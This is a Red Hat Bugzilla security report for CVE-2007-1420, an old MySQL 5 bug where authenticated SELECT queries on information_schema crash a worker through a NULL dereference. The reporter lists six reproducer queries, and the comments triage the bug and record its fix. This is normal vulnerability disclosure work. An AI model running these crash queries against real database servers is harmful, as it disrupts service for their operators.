Bug 232603 (CVE-2007-1420) - CVE-2007-1420 Single MySQL worker can be crashed (NULL deref) with certain SELECT statements
Status: CLOSED ERRATA
Alias: CVE-2007-1420
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: low
Severity: low
Target Milestone: ---
Assignee: Tom Lane
QA Contact: David Lawrence
URL: http://www.securityfocus.com/bid/2290...
Reported: 2007-03-16 12:16 UTC by Red Hat Product Security
Modified: 2021-11-12 19:38 UTC

Last Closed: 2008-07-25 08:14:03 UTC

Links:
Red Hat Product Errata RHSA-2008:0364 (priority normal, status SHIPPED_LIVE): "Low: mysql security and bug fix update", last updated 2008-05-20 12:44:41 UTC

Description Lubomir Kundrak 2007-03-16 12:16:35 UTC
Description of problem:

A NULL pointer dereference occurs after issuing the SELECT statements
below. Security impact is very limited, as only one worker crashes, leaving
the server running and ready for service. Additionally, an attacker must be
authenticated and permitted to execute arbitrary SELECT statements.

Version-Release number of selected component (if applicable):

Does not affect MySQL 4.

How reproducible:

Always, by an authenticated user.

Steps to Reproduce:

SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');

Actual results:

The session closes prematurely, fault message in the log file.

Expected results:

I expected it to crash. I like this section of a bug report.

Comment 1 Tom Lane 2007-03-16 15:23:26 UTC
The mysql 5.0.36/37 release notes mention something like twenty different
crashing bugs fixed.  What's your rationale for harping on this particular one?

Comment 2 Lubomir Kundrak 2007-03-19 09:16:27 UTC
tgl: a CVE. Pardon me for forgetting to mention it in the Summary.

Comment 7 Mark J. Cox 2007-08-21 10:55:38 UTC
Moving to security response parent bug; we only create tracking bugs once it has
been decided we will fix this issue in a particular release.

Comment 9 Mark J. Cox 2007-09-10 08:21:39 UTC
Red Hat does not consider this to be a security issue. It requires an
attacker to be authenticated and after triggering the crash the
database server will restart and continue to service requests.


Comment 11 Red Hat Product Security 2008-07-25 08:14:03 UTC
This issue was addressed in:

Red Hat Enterprise Linux:
  http://rhn.redhat.com/errata/RHSA-2008-0364.html
Comment 12 Red Hat Bugzilla 2009-10-23 19:07:05 UTC
Reporter changed to security-response-team by request of Jay Turner.